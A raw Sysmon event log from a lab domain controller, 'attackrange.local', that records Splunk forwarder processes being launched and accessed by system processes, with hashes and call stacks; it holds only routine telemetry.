dll+51791 10341000x80000000000000004297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4332-6000-EE00-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4332-6000-EE00-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.270{08A6967A-4332-6000-EE00-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000004339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.803{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000004338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.803{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.803{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.772{08A6967A-4333-6000-F000-000000009A01}43442288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.615{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.616{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.099{08A6967A-4332-6000-EF00-000000009A01}43922480C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4334-6000-F100-000000009A01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 